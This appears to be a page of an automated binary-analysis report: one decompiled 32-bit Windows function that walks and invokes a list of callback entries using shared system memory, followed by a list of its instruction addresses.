                                                                                                                                                                                      • Instruction Fuzzy Hash: F4910576609791FFC316CB28C880B3AB7A5BF84A51F014559FAC89B291DB34E840CBD3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                      			E1D86EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                      				intOrPtr _t196;
                                                                                                                                                                                      				signed int _t201;
                                                                                                                                                                                      				signed int _t202;
                                                                                                                                                                                      				intOrPtr _t206;
                                                                                                                                                                                      				signed int _t207;
                                                                                                                                                                                      				intOrPtr _t209;
                                                                                                                                                                                      				intOrPtr _t215;
                                                                                                                                                                                      				signed int _t222;
                                                                                                                                                                                      				signed int _t227;
                                                                                                                                                                                      				signed int _t228;
                                                                                                                                                                                      				signed int _t231;
                                                                                                                                                                                      				signed int _t244;
                                                                                                                                                                                      				signed int _t247;
                                                                                                                                                                                      				char* _t250;
                                                                                                                                                                                      				intOrPtr _t255;
                                                                                                                                                                                      				signed int _t269;
                                                                                                                                                                                      				signed int* _t270;
                                                                                                                                                                                      				intOrPtr _t279;
                                                                                                                                                                                      				signed char _t284;
                                                                                                                                                                                      				signed int _t291;
                                                                                                                                                                                      				signed int _t292;
                                                                                                                                                                                      				intOrPtr _t301;
                                                                                                                                                                                      				intOrPtr* _t307;
                                                                                                                                                                                      				signed int _t308;
                                                                                                                                                                                      				signed int _t309;
                                                                                                                                                                                      				intOrPtr _t313;
                                                                                                                                                                                      				intOrPtr _t314;
                                                                                                                                                                                      				intOrPtr* _t316;
                                                                                                                                                                                      				void* _t318;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(0x7c);
                                                                                                                                                                                      				_push(0x1d91c610);
                                                                                                                                                                                      				E1D897C40(__ebx, __edi, __esi);
                                                                                                                                                                                      				_t313 = __edx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
                                                                                                                                                                                      				 *(_t318 - 0x58) = 0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x74)) = 0;
                                                                                                                                                                                      				_t269 = 0;
                                                                                                                                                                                      				 *(_t318 - 0x64) = 0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
                                                                                                                                                                                      				_t196 = __edx + 0x28;
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
                                                                                                                                                                                      				L1D852330(_t196, _t196);
                                                                                                                                                                                      				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                                                                                      				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
                                                                                                                                                                                      				L1:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
                                                                                                                                                                                      						E1D8524D0( *((intOrPtr*)(_t318 - 0x78)));
                                                                                                                                                                                      						asm("sbb ebx, ebx");
                                                                                                                                                                                      						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
                                                                                                                                                                                      						return  ~_t269 & 0xc000022d;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
                                                                                                                                                                                      					_t307 = 0x7ffe0010;
                                                                                                                                                                                      					_t270 = 0x7ffe03b0;
                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									L4:
                                                                                                                                                                                      									_t201 =  *0x1d9367f0; // 0x0
                                                                                                                                                                                      									 *(_t318 - 0x30) = _t201;
                                                                                                                                                                                      									_t202 =  *0x1d9367f4; // 0x0
                                                                                                                                                                                      									 *(_t318 - 0x3c) = _t202;
                                                                                                                                                                                      									 *(_t318 - 0x28) =  *_t270;
                                                                                                                                                                                      									 *(_t318 - 0x5c) = _t270[1];
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										_t301 =  *0x7ffe000c;
                                                                                                                                                                                      										_t279 =  *0x7ffe0008;
                                                                                                                                                                                      										__eflags = _t301 -  *_t307;
                                                                                                                                                                                      										if(_t301 ==  *_t307) {
                                                                                                                                                                                      											goto L6;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										asm("pause");
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L6:
                                                                                                                                                                                      									_t270 = 0x7ffe03b0;
                                                                                                                                                                                      									_t308 =  *0x7ffe03b0;
                                                                                                                                                                                      									 *(_t318 - 0x38) = _t308;
                                                                                                                                                                                      									_t206 =  *0x7FFE03B4;
                                                                                                                                                                                      									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x28) - _t308;
                                                                                                                                                                                      									_t307 = 0x7ffe0010;
                                                                                                                                                                                      								} while ( *(_t318 - 0x28) != _t308);
                                                                                                                                                                                      								__eflags =  *(_t318 - 0x5c) - _t206;
                                                                                                                                                                                      							} while ( *(_t318 - 0x5c) != _t206);
                                                                                                                                                                                      							_t207 =  *0x1d9367f0; // 0x0
                                                                                                                                                                                      							_t309 =  *0x1d9367f4; // 0x0
                                                                                                                                                                                      							 *(_t318 - 0x28) = _t309;
                                                                                                                                                                                      							__eflags =  *(_t318 - 0x30) - _t207;
                                                                                                                                                                                      							_t307 = 0x7ffe0010;
                                                                                                                                                                                      						} while ( *(_t318 - 0x30) != _t207);
                                                                                                                                                                                      						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
                                                                                                                                                                                      					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
                                                                                                                                                                                      					_t316 =  *((intOrPtr*)(_t318 - 0x68));
                                                                                                                                                                                      					_t269 =  *(_t318 - 0x64);
                                                                                                                                                                                      					asm("sbb edx, [ebp-0x34]");
                                                                                                                                                                                      					asm("sbb edx, eax");
                                                                                                                                                                                      					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
                                                                                                                                                                                      					asm("adc edx, edi");
                                                                                                                                                                                      					asm("lock inc dword [esi+0x28]");
                                                                                                                                                                                      					_t209 =  *((intOrPtr*)(_t318 - 0x20));
                                                                                                                                                                                      					_t40 = _t209 + 0x18; // 0x19aae78
                                                                                                                                                                                      					_t284 =  *(_t316 + 0x20) &  *_t40;
                                                                                                                                                                                      					 *(_t318 - 0x38) = _t284;
                                                                                                                                                                                      					__eflags =  *(_t316 + 0x30);
                                                                                                                                                                                      					if( *(_t316 + 0x30) != 0) {
                                                                                                                                                                                      						L37:
                                                                                                                                                                                      						_t314 =  *_t316;
                                                                                                                                                                                      						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
                                                                                                                                                                                      						E1D86F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
                                                                                                                                                                                      						__eflags =  *(_t318 - 0x58);
                                                                                                                                                                                      						if( *(_t318 - 0x58) != 0) {
                                                                                                                                                                                      							 *0x1d9391e0( *((intOrPtr*)(_t318 - 0x74)));
                                                                                                                                                                                      							 *(_t318 - 0x58)();
                                                                                                                                                                                      						}
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t284;
                                                                                                                                                                                      					if(_t284 == 0) {
                                                                                                                                                                                      						goto L37;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *(_t318 - 0x60) = _t284;
                                                                                                                                                                                      					_t44 = _t318 - 0x60;
                                                                                                                                                                                      					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
                                                                                                                                                                                      					__eflags =  *_t44;
                                                                                                                                                                                      					if( *_t44 == 0) {
                                                                                                                                                                                      						L40:
                                                                                                                                                                                      						__eflags = _t284 & 0xfffffffe;
                                                                                                                                                                                      						if((_t284 & 0xfffffffe) != 0) {
                                                                                                                                                                                      							__eflags =  *(_t316 + 0x60);
                                                                                                                                                                                      							if( *(_t316 + 0x60) == 0) {
                                                                                                                                                                                      								L14:
                                                                                                                                                                                      								__eflags =  *(_t316 + 0x3c);
                                                                                                                                                                                      								if( *(_t316 + 0x3c) != 0) {
                                                                                                                                                                                      									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
                                                                                                                                                                                      									if(__eflags > 0) {
                                                                                                                                                                                      										goto L15;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                                                                      										L59:
                                                                                                                                                                                      										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x19b0af4
                                                                                                                                                                                      										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
                                                                                                                                                                                      										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L15;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
                                                                                                                                                                                      									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
                                                                                                                                                                                      										goto L15;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L59;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L15:
                                                                                                                                                                                      								__eflags =  *(_t318 + 8);
                                                                                                                                                                                      								if( *(_t318 + 8) != 0) {
                                                                                                                                                                                      									__eflags =  *(_t316 + 0x54);
                                                                                                                                                                                      									if( *(_t316 + 0x54) != 0) {
                                                                                                                                                                                      										goto L16;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L16:
                                                                                                                                                                                      								 *(_t318 - 0x24) = 0;
                                                                                                                                                                                      								 *(_t318 - 0x30) = 0;
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
                                                                                                                                                                                      								_t215 =  *((intOrPtr*)(_t316 + 8));
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
                                                                                                                                                                                      								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
                                                                                                                                                                                      								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                      								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
                                                                                                                                                                                      								 *(_t318 - 0x8c) = _t222;
                                                                                                                                                                                      								_t291 = _t222;
                                                                                                                                                                                      								 *(_t318 - 0x28) = _t291;
                                                                                                                                                                                      								 *(_t318 - 0x88) = _t291;
                                                                                                                                                                                      								E1D8524D0(_t222);
                                                                                                                                                                                      								_t292 = 0;
                                                                                                                                                                                      								 *(_t318 - 0x50) = 0;
                                                                                                                                                                                      								 *(_t318 - 0x4c) = 0;
                                                                                                                                                                                      								 *(_t318 - 0x3c) = 0;
                                                                                                                                                                                      								__eflags =  *(_t316 + 0x24);
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									asm("lock bts dword [eax], 0x0");
                                                                                                                                                                                      									_t227 = 0;
                                                                                                                                                                                      									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
                                                                                                                                                                                      									 *(_t318 - 0x4c) = _t228;
                                                                                                                                                                                      									 *(_t318 - 0x3c) = _t228;
                                                                                                                                                                                      									__eflags = _t228;
                                                                                                                                                                                      									if(_t228 != 0) {
                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t318 + 8) - 1;
                                                                                                                                                                                      									if( *(_t318 + 8) == 1) {
                                                                                                                                                                                      										L1D852330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
                                                                                                                                                                                      										_t228 = 1;
                                                                                                                                                                                      										 *(_t318 - 0x4c) = 1;
                                                                                                                                                                                      										 *(_t318 - 0x3c) = 1;
                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t231 = _t228 + 1;
                                                                                                                                                                                      									L35:
                                                                                                                                                                                      									 *(_t316 + 0x54) = _t231;
                                                                                                                                                                                      									__eflags = _t292;
                                                                                                                                                                                      									if(_t292 == 0) {
                                                                                                                                                                                      										L1D852330(_t231,  *(_t318 - 0x28));
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L17:
                                                                                                                                                                                      								__eflags =  *(_t316 + 0x30);
                                                                                                                                                                                      								if( *(_t316 + 0x30) != 0) {
                                                                                                                                                                                      									L26:
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x4c);
                                                                                                                                                                                      									if( *(_t318 - 0x4c) != 0) {
                                                                                                                                                                                      										_t228 = E1D8524D0( *(_t316 + 0x24) + 0x10);
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x30);
                                                                                                                                                                                      									if( *(_t318 - 0x30) == 0) {
                                                                                                                                                                                      										L71:
                                                                                                                                                                                      										_t292 =  *(_t318 - 0x50);
                                                                                                                                                                                      										L34:
                                                                                                                                                                                      										_t231 = 0;
                                                                                                                                                                                      										goto L35;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L1D852330(_t228,  *(_t318 - 0x8c));
                                                                                                                                                                                      									_t292 = 1;
                                                                                                                                                                                      									 *(_t318 - 0x50) = 1;
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x24) - 0xc000022d;
                                                                                                                                                                                      									if( *(_t318 - 0x24) == 0xc000022d) {
                                                                                                                                                                                      										L69:
                                                                                                                                                                                      										__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                                                                                                                                      										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
                                                                                                                                                                                      											goto L34;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t269 = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										 *(_t318 - 0x64) = 1;
                                                                                                                                                                                      										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x19b0af4
                                                                                                                                                                                      										E1D8CC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
                                                                                                                                                                                      										goto L71;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x24) - 0xc0000017;
                                                                                                                                                                                      									if( *(_t318 - 0x24) == 0xc0000017) {
                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t316 + 0x18);
                                                                                                                                                                                      									if( *(_t316 + 0x18) != 0) {
                                                                                                                                                                                      										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x19b0af4
                                                                                                                                                                                      										__eflags =  *_t133 -  *(_t316 + 0x18);
                                                                                                                                                                                      										if( *_t133 -  *(_t316 + 0x18) > 0) {
                                                                                                                                                                                      											goto L31;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										L32:
                                                                                                                                                                                      										__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                                                                                                                                      										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
                                                                                                                                                                                      											__eflags =  *(_t316 + 0x4c);
                                                                                                                                                                                      											if( *(_t316 + 0x4c) > 0) {
                                                                                                                                                                                      												 *(_t316 + 0x3c) = 0;
                                                                                                                                                                                      												 *((intOrPtr*)(_t316 + 0x50)) = 0;
                                                                                                                                                                                      												 *((intOrPtr*)(_t316 + 0x44)) = 0;
                                                                                                                                                                                      												 *((intOrPtr*)(_t316 + 0x48)) = 0;
                                                                                                                                                                                      												 *(_t316 + 0x4c) = 0;
                                                                                                                                                                                      												 *((intOrPtr*)(_t316 + 0x58)) = 0;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L31:
                                                                                                                                                                                      									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x19b0af4
                                                                                                                                                                                      									 *(_t316 + 0x18) =  *_t107;
                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t318 - 0x30) = 1;
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 0x6c)) = E1D86F1F0( *((intOrPtr*)(_t318 - 0x6c)));
                                                                                                                                                                                      								 *((intOrPtr*)(_t318 - 4)) = 0;
                                                                                                                                                                                      								__eflags =  *(_t318 - 0x60);
                                                                                                                                                                                      								if( *(_t318 - 0x60) != 0) {
                                                                                                                                                                                      									_t255 =  *((intOrPtr*)(_t318 - 0x20));
                                                                                                                                                                                      									_t82 = _t255 + 0x14; // 0x19aae78
                                                                                                                                                                                      									_t86 = _t255 + 0x10; // 0x19b0af4
                                                                                                                                                                                      									 *0x1d9391e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
                                                                                                                                                                                      									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t244 =  *(_t318 - 0x38);
                                                                                                                                                                                      								__eflags = _t244 & 0x00000010;
                                                                                                                                                                                      								if((_t244 & 0x00000010) != 0) {
                                                                                                                                                                                      									__eflags =  *(_t316 + 0x30);
                                                                                                                                                                                      									if( *(_t316 + 0x30) != 0) {
                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t318 - 0x24);
                                                                                                                                                                                      									if( *(_t318 - 0x24) >= 0) {
                                                                                                                                                                                      										L64:
                                                                                                                                                                                      										 *0x1d9391e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
                                                                                                                                                                                      										 *((intOrPtr*)(_t318 - 0x2c))();
                                                                                                                                                                                      										 *(_t318 - 0x24) = 0;
                                                                                                                                                                                      										_t244 =  *(_t318 - 0x38);
                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                                                                                                                                      									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L64;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									L21:
                                                                                                                                                                                      									__eflags = _t244 & 0xffffffee;
                                                                                                                                                                                      									if((_t244 & 0xffffffee) != 0) {
                                                                                                                                                                                      										 *(_t318 - 0x24) = 0;
                                                                                                                                                                                      										 *0x1d9391e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
                                                                                                                                                                                      										 *((intOrPtr*)(_t318 - 0x2c))();
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t247 = E1D853C40();
                                                                                                                                                                                      									__eflags = _t247;
                                                                                                                                                                                      									if(_t247 != 0) {
                                                                                                                                                                                      										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t250 = 0x7ffe038e;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *_t250;
                                                                                                                                                                                      									if( *_t250 != 0) {
                                                                                                                                                                                      										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x19b0af4
                                                                                                                                                                                      										_t250 = E1D8CC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
                                                                                                                                                                                      									E1D86F1DB(_t250);
                                                                                                                                                                                      									_t228 = E1D86F1F0( *((intOrPtr*)(_t318 - 0x6c)));
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t284 & 0x00000010;
                                                                                                                                                                                      						if((_t284 & 0x00000010) == 0) {
                                                                                                                                                                                      							goto L37;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *(_t316 + 0x18);
                                                                                                                                                                                      					if( *(_t316 + 0x18) != 0) {
                                                                                                                                                                                      						_t120 = _t209 + 0x10; // 0x19b0af4
                                                                                                                                                                                      						__eflags =  *_t120 -  *(_t316 + 0x18);
                                                                                                                                                                                      						if( *_t120 -  *(_t316 + 0x18) > 0) {
                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L40;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}
































                                                                                                                                                                                      0x1d86ee48
                                                                                                                                                                                      0x1d86ee4a
                                                                                                                                                                                      0x1d86ee4f
                                                                                                                                                                                      0x1d86ee54
                                                                                                                                                                                      0x1d86ee56
                                                                                                                                                                                      0x1d86ee5b
                                                                                                                                                                                      0x1d86ee60
                                                                                                                                                                                      0x1d86ee63
                                                                                                                                                                                      0x1d86ee66
                                                                                                                                                                                      0x1d86ee68
                                                                                                                                                                                      0x1d86ee70
                                                                                                                                                                                      0x1d86ee73
                                                                                                                                                                                      0x1d86ee76
                                                                                                                                                                                      0x1d86ee79
                                                                                                                                                                                      0x1d86ee80
                                                                                                                                                                                      0x1d86ee85
                                                                                                                                                                                      0x1d86ee88
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86ee8b
                                                                                                                                                                                      0x1d86ee93
                                                                                                                                                                                      0x1d86ee98
                                                                                                                                                                                      0x1d86ee9f
                                                                                                                                                                                      0x1d86eeac
                                                                                                                                                                                      0x1d86eeb8
                                                                                                                                                                                      0x1d86eeb8
                                                                                                                                                                                      0x1d86eebe
                                                                                                                                                                                      0x1d86eec6
                                                                                                                                                                                      0x1d86eec9
                                                                                                                                                                                      0x1d86eec9
                                                                                                                                                                                      0x1d86eece
                                                                                                                                                                                      0x1d86eece
                                                                                                                                                                                      0x1d86eece
                                                                                                                                                                                      0x1d86eece
                                                                                                                                                                                      0x1d86eece
                                                                                                                                                                                      0x1d86eece
                                                                                                                                                                                      0x1d86eed3
                                                                                                                                                                                      0x1d86eed6
                                                                                                                                                                                      0x1d86eedb
                                                                                                                                                                                      0x1d86eee0
                                                                                                                                                                                      0x1d86eee6
                                                                                                                                                                                      0x1d86eeee
                                                                                                                                                                                      0x1d86eeee
                                                                                                                                                                                      0x1d86eef0
                                                                                                                                                                                      0x1d86eef4
                                                                                                                                                                                      0x1d86eef6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f1dc
                                                                                                                                                                                      0x1d86f1dc
                                                                                                                                                                                      0x1d86eefc
                                                                                                                                                                                      0x1d86eefc
                                                                                                                                                                                      0x1d86ef01
                                                                                                                                                                                      0x1d86ef03
                                                                                                                                                                                      0x1d86ef06
                                                                                                                                                                                      0x1d86ef09
                                                                                                                                                                                      0x1d86ef0c
                                                                                                                                                                                      0x1d86ef0f
                                                                                                                                                                                      0x1d86ef0f
                                                                                                                                                                                      0x1d86ef16
                                                                                                                                                                                      0x1d86ef16
                                                                                                                                                                                      0x1d86ef1b
                                                                                                                                                                                      0x1d86ef20
                                                                                                                                                                                      0x1d86ef26
                                                                                                                                                                                      0x1d86ef29
                                                                                                                                                                                      0x1d86ef2c
                                                                                                                                                                                      0x1d86ef2c
                                                                                                                                                                                      0x1d86ef36
                                                                                                                                                                                      0x1d86ef36
                                                                                                                                                                                      0x1d86ef3b
                                                                                                                                                                                      0x1d86ef40
                                                                                                                                                                                      0x1d86ef46
                                                                                                                                                                                      0x1d86ef4c
                                                                                                                                                                                      0x1d86ef54
                                                                                                                                                                                      0x1d86ef57
                                                                                                                                                                                      0x1d86ef59
                                                                                                                                                                                      0x1d86ef60
                                                                                                                                                                                      0x1d86ef63
                                                                                                                                                                                      0x1d86ef63
                                                                                                                                                                                      0x1d86ef66
                                                                                                                                                                                      0x1d86ef69
                                                                                                                                                                                      0x1d86ef6c
                                                                                                                                                                                      0x1d86f113
                                                                                                                                                                                      0x1d86f113
                                                                                                                                                                                      0x1d86f115
                                                                                                                                                                                      0x1d86f122
                                                                                                                                                                                      0x1d86f127
                                                                                                                                                                                      0x1d86f12b
                                                                                                                                                                                      0x1d8afe64
                                                                                                                                                                                      0x1d8afe6a
                                                                                                                                                                                      0x1d8afe6a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f12b
                                                                                                                                                                                      0x1d86ef72
                                                                                                                                                                                      0x1d86ef74
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86ef7a
                                                                                                                                                                                      0x1d86ef7d
                                                                                                                                                                                      0x1d86ef7d
                                                                                                                                                                                      0x1d86ef7d
                                                                                                                                                                                      0x1d86ef81
                                                                                                                                                                                      0x1d86f144
                                                                                                                                                                                      0x1d86f144
                                                                                                                                                                                      0x1d86f14a
                                                                                                                                                                                      0x1d8afd20
                                                                                                                                                                                      0x1d8afd23
                                                                                                                                                                                      0x1d86ef90
                                                                                                                                                                                      0x1d86ef90
                                                                                                                                                                                      0x1d86ef93
                                                                                                                                                                                      0x1d8afd2e
                                                                                                                                                                                      0x1d8afd31
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afd37
                                                                                                                                                                                      0x1d8afd45
                                                                                                                                                                                      0x1d8afd4b
                                                                                                                                                                                      0x1d8afd4b
                                                                                                                                                                                      0x1d8afd4e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afd54
                                                                                                                                                                                      0x1d8afd3c
                                                                                                                                                                                      0x1d8afd3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afd3f
                                                                                                                                                                                      0x1d86ef99
                                                                                                                                                                                      0x1d86ef99
                                                                                                                                                                                      0x1d86ef9c
                                                                                                                                                                                      0x1d86f1a6
                                                                                                                                                                                      0x1d86f1a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f1af
                                                                                                                                                                                      0x1d86efa2
                                                                                                                                                                                      0x1d86efa2
                                                                                                                                                                                      0x1d86efa5
                                                                                                                                                                                      0x1d86efab
                                                                                                                                                                                      0x1d86efae
                                                                                                                                                                                      0x1d86efb4
                                                                                                                                                                                      0x1d86efba
                                                                                                                                                                                      0x1d86efc0
                                                                                                                                                                                      0x1d86efc6
                                                                                                                                                                                      0x1d86efcc
                                                                                                                                                                                      0x1d86efd8
                                                                                                                                                                                      0x1d86efde
                                                                                                                                                                                      0x1d86efe1
                                                                                                                                                                                      0x1d86efe7
                                                                                                                                                                                      0x1d86efe9
                                                                                                                                                                                      0x1d86efec
                                                                                                                                                                                      0x1d86eff3
                                                                                                                                                                                      0x1d86eff8
                                                                                                                                                                                      0x1d86effa
                                                                                                                                                                                      0x1d86efff
                                                                                                                                                                                      0x1d86f002
                                                                                                                                                                                      0x1d86f008
                                                                                                                                                                                      0x1d86f00a
                                                                                                                                                                                      0x1d86f15d
                                                                                                                                                                                      0x1d86f164
                                                                                                                                                                                      0x1d86f165
                                                                                                                                                                                      0x1d86f168
                                                                                                                                                                                      0x1d86f16b
                                                                                                                                                                                      0x1d86f16e
                                                                                                                                                                                      0x1d86f170
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f176
                                                                                                                                                                                      0x1d86f17a
                                                                                                                                                                                      0x1d86f1c8
                                                                                                                                                                                      0x1d86f1cf
                                                                                                                                                                                      0x1d86f1d0
                                                                                                                                                                                      0x1d86f1d3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f1d3
                                                                                                                                                                                      0x1d86f17c
                                                                                                                                                                                      0x1d86f105
                                                                                                                                                                                      0x1d86f105
                                                                                                                                                                                      0x1d86f108
                                                                                                                                                                                      0x1d86f10a
